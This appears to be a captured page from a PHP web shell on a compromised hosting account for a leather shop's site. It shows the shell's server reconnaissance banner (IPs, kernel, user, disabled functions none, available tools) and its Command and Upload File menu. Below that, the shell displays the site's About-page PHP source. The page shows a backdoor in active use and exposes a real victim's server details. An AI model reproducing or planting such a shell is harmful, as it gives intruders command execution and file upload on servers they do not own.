Server IP : 103.53.40.154 / Your IP : 3.141.38.5 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/leatheroncall.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $sqlab = "SELECT * FROM `tbl_about` WHERE a_id=1"; $runab = mysqli_query($db,$sqlab) or die("Query Not run"); $datab = mysqli_fetch_assoc($runab); ?> <!doctype html> <html class="no-js" lang="zxx"> <head> <title> <?php echo $datab["meta_title"];?> </title> <meta name="description" content="<?php echo $datab["meta_desc"];?>"> <?php include 'top-link.php';?> <style> .shop-product .box{ background:#e9e7e7; padding:10px; border-radius:10px; margin-top:10px; } .shop-product .box .product-image{ /* width:253px; */ height: 175px; } .shop-product .box img{ width:100%; height:auto; transition: 0.4s ease-in-out; } .shop-product .box img:hover{ transform: scale(1.03); } .shop-product .box h3{ font-size: 13px; margin: 10px auto; display: table; color: #333333;; } @media screen and (max-width: 767px) { .shop-product .box .product-image{ height: 141px; } .shop-product .box h3{ font-size: 11px; } .col-md-3{ width:50%; } } </style> </head> <body> <div class="body-wrapper"> <?php include 'header.php';?> <!-- Begin Page Banner Area --> <div class="page-banner"> <div class="container"> <div class="page-banner-content"> <ul> <li><a href="<?php echo $wspath?>">Home</a></li> <li class="active"><a >About Us</a></li> </ul> </div> </div> </div> <!-- Begin About Area --> <div class="about-area"> <div class="container-fluid"> <div class="row align-items-center"> <div class="col-lg-6 p-0"> <!-- Begin About Image Area --> <div class="about-img"> <img src="<?php echo $wspath?>admin/images/<?php echo $datab['about_img'];?>" alt="<?php echo $datab['about_img'];?>"> </div> <!-- About Image Area End Here --> </div> <div class="col-lg-6"> <!-- Begin About Content Area --> <div class="about-us-content text-center"> <?php echo $datab['about_desc'];?> <!--<div class="about-us-btn">--> <!-- <a href="#">View Work</a>--> <!--</div>--> </div> <!-- Begin About Content Area --> </div> </div> </div> </div> <!-- About Area End Here --> <?php include 'footer.php';?> </div> </body> </html>